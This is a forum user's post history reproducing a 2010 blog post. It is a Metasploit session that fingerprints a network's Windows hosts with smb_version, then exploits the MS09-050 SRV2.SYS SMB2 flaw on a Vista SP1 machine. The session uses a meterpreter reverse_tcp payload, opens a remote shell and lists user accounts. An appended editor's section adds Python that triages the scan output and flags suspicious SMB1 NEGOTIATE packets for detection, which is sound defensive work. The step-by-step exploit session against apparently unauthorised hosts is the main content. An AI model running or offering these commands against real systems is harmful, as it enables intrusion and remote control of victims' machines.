Everything posted by djmed

  1. http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html

     [o] Exploiting Vista SP1 with SMB2 [metasploit]
     [o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

     root@evilc0de:~# msfconsole

                      <>
      ------------
            \   ,__,
             \  (oo)____
                (__)    )\
                   ||--|| *

            =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
     + -- --=[ 590 exploits - 302 auxiliary
     + -- --=[ 224 payloads - 27 encoders - 8 nops
            =[ svn r10414 updated today (2010.09.21)

     msf > use scanner/smb/smb_version
     msf auxiliary(smb_version) > show options

     Module options:

        Name       Current Setting  Required  Description
        ----       ---------------  --------  -----------
        RHOSTS                      yes       The target address range or CIDR identifier
        SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
        SMBPass                     no        The password for the specified username
        SMBUser                     no        The username to authenticate as
        THREADS    1                yes       The number of concurrent threads

     msf auxiliary(smb_version) > set RHOSTS
     RHOSTS =>
     msf auxiliary(smb_version) > set THREADS 50
     THREADS => 50
     msf auxiliary(smb_version) > show options

     Module options:

        Name       Current Setting  Required  Description
        ----       ---------------  --------  -----------
        RHOSTS                      yes       The target address range or CIDR identifier
        SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
        SMBPass                     no        The password for the specified username
        SMBUser                     no        The username to authenticate as
        THREADS    50               yes       The number of concurrent threads

     msf auxiliary(smb_version) > run

     [*] is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
     [*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
     [*] is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
     [*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

     msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
     msf exploit(ms09_050_smb2_negotiate_func_index) > info

            Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Version: 9669
        Platform: Windows
      Privileged: Yes
         License: Metasploit Framework License (BSD)
            Rank: Good

     Provided by:
       laurent.gaffie
       hdm
       sf

     Available targets:
       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)

     Basic options:
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  445              yes       The target port
       WAIT   180              yes       The number of seconds to wait for the attack to complete.

     Payload information:
       Space: 1024

     Description:
       This module exploits an out of bounds function table dereference in
       the SMB request validation code of the SRV2.SYS driver included with
       Windows Vista, Windows 7 release candidates (not RTM), and Windows
       2008 Server prior to R2. Windows Vista without SP1 does not seem
       affected by this flaw.

     References:
       http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
       http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
       http://www.securityfocus.com/bid/36299
       http://www.osvdb.org/57799
       http://seclists.org/fulldisclosure/2009/Sep/0039.html
       http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

     msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
     payload => windows/meterpreter/reverse_tcp
     msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST
     RHOST =>
     msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST
     LHOST =>
     msf exploit(ms09_050_smb2_negotiate_func_index) > show options

     Module options:

        Name   Current Setting  Required  Description
        ----   ---------------  --------  -----------
        RHOST                   yes       The target address
        RPORT  445              yes       The target port
        WAIT   180              yes       The number of seconds to wait for the attack to complete.

     Payload options (windows/meterpreter/reverse_tcp):

        Name      Current Setting  Required  Description
        ----      ---------------  --------  -----------
        EXITFUNC  thread           yes       Exit technique: seh, thread, process
        LHOST                      yes       The listen address
        LPORT     4444             yes       The listen port

     Exploit target:

        Id  Name
        --  ----
        0   Windows Vista SP1/SP2 and Server 2008 (x86)

     msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

     [*] Started reverse handler on
     [*] Connecting to the target (
     [*] Sending the exploit packet (872 bytes)...
     [*] Waiting up to 180 seconds for exploit to trigger...
     [*] Sending stage (748544 bytes) to
     [*] Meterpreter session 1 opened ( -> at 2010-09-21 23:31:10 +0700

     meterpreter > sysinfo
     Computer: PUPEN-SNOWBLACK
     OS      : Windows Vista (Build 6001, Service Pack 1).
     Arch    : x86
     Language: en_US
     meterpreter > shell
     Process 1240 created.
     Channel 1 created.
     Microsoft Windows [Version 6.0.6001]
     Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

     C:\Windows\system32>net user
     net user

     User accounts for \\
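The post above shows the attacker's side only: fingerprint the subnet with smb_version, pick the Vista SP1 box, fire ms09_050_smb2_negotiate_func_index. The following is an added example by the editor, not code from the blog post or from Metasploit, covering the two things a defender wants from this page: a triage of smb_version output against the module's stated target (Vista SP1/SP2 and Server 2008 before R2; Vista RTM, Windows 7 RTM build 7600 and XP fall outside it, as the module description says), and a packet check keyed on the field the module is named after, the SMB header's Process ID High in a NEGOTIATE request. Assumptions, stated in the code as well: the 32-byte SMB1 header layout is the documented MS-CIFS one; the heuristic "a NEGOTIATE whose PID High is non-zero is worth an alert" is the editor's own, derived only from the module name, and the constructed negotiate packets are minimal samples for exercising the parser, not the exploit packet the module sends (that packet's contents are not reproduced on the page and are not reconstructed here). The scan lines are a constructed copy of the four fingerprint lines in the post; the IPs were already absent there.

```python
"""Added example (editor's code, not from the post or Metasploit): triage of
smb_version output and a PID-High check on SMB1 NEGOTIATE requests.
Assumptions: documented MS-CIFS SMB1 header layout; the non-zero-PID-High
heuristic is the editor's; all packets and scan lines are constructed."""
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# protocol, command, status, flags, flags2, pid_high, security_features,
# reserved, tid, pid_low, uid, mid  (little-endian, 32 bytes, per MS-CIFS)
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


@dataclass
class Smb1Header:
    command: int
    flags2: int
    pid_high: int   # "Process ID High": offset 12 of the SMB1 header
    pid_low: int
    tid: int
    uid: int
    mid: int


def parse_smb1(payload: bytes) -> Optional[Smb1Header]:
    """Parse one NetBIOS-session-framed SMB1 request; None if it is not one."""
    if len(payload) < 4 + SMB1_HEADER.size or payload[0] != 0x00:
        return None                       # 0x00 = NetBIOS session message
    nb_len = int.from_bytes(payload[1:4], "big")
    body = payload[4:4 + nb_len]
    if len(body) < SMB1_HEADER.size:
        return None
    (proto, cmd, _status, _flags, flags2, pid_high,
     _sec, _reserved, tid, pid_low, uid, mid) = SMB1_HEADER.unpack_from(body)
    if proto != SMB1_MAGIC:
        return None
    return Smb1Header(cmd, flags2, pid_high, pid_low, tid, uid, mid)


def is_suspicious_negotiate(payload: bytes) -> bool:
    """Editor's heuristic: ordinary clients send NEGOTIATE with PID High == 0,
    so a non-zero value in that one command is flagged for a closer look."""
    hdr = parse_smb1(payload)
    return hdr is not None and hdr.command == SMB_COM_NEGOTIATE and hdr.pid_high != 0


def build_negotiate(pid_high: int, dialects: List[bytes]) -> bytes:
    """Constructed sample: a minimal SMB_COM_NEGOTIATE request (not the
    module's exploit packet) with a caller-chosen PID High."""
    hdr = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                           pid_high, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # dialect list
    body = hdr + b"\x00" + struct.pack("<H", len(data)) + data  # WordCount = 0
    return b"\x00" + len(body).to_bytes(3, "big") + body        # NetBIOS frame


# --- triage of smb_version lines against the module's target list ----------
SCAN_LINE = re.compile(r"is running (?P<os>.+?) \(language:.*?\(name:(?P<name>[^)]+)\)")


def likely_affected(os_string: str) -> bool:
    """Mirror the module text: Vista SP1/SP2 and Server 2008 before R2.
    Vista RTM, Windows 7 RTM (build 7600) and XP are outside the target."""
    if "Vista" in os_string:
        return "Service Pack" in os_string
    if "2008" in os_string:
        return "R2" not in os_string
    return False


def triage(scan_output: str) -> List[str]:
    """Host names from smb_version output that fall inside the target list."""
    return [m.group("name") for m in SCAN_LINE.finditer(scan_output)
            if likely_affected(m.group("os"))]


# Constructed copy of the four fingerprint lines in the post (no IPs there either).
SCAN_OUTPUT = """\
[*] is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)
"""

if __name__ == "__main__":
    print("in-target hosts:", triage(SCAN_OUTPUT))
    for pid_high in (0x0000, 0x0026):
        pkt = build_negotiate(pid_high, [b"NT LM 0.12", b"SMB 2.002"])
        print(f"PID High {pid_high:#06x}: suspicious={is_suspicious_negotiate(pkt)}")
```

Run against the post's own scan output the triage returns only PUPEN-SNOWBLACK, which is the box the post goes on to pop. The PID-High check is a heuristic, not a signature for CVE-2009-3103: it says nothing about SMB2-native traffic on the same port, and an environment with unusual clients should be baselined before the rule is trusted. Patching per MS09-050 is the fix; the check only tells you who was poking at unpatched hosts.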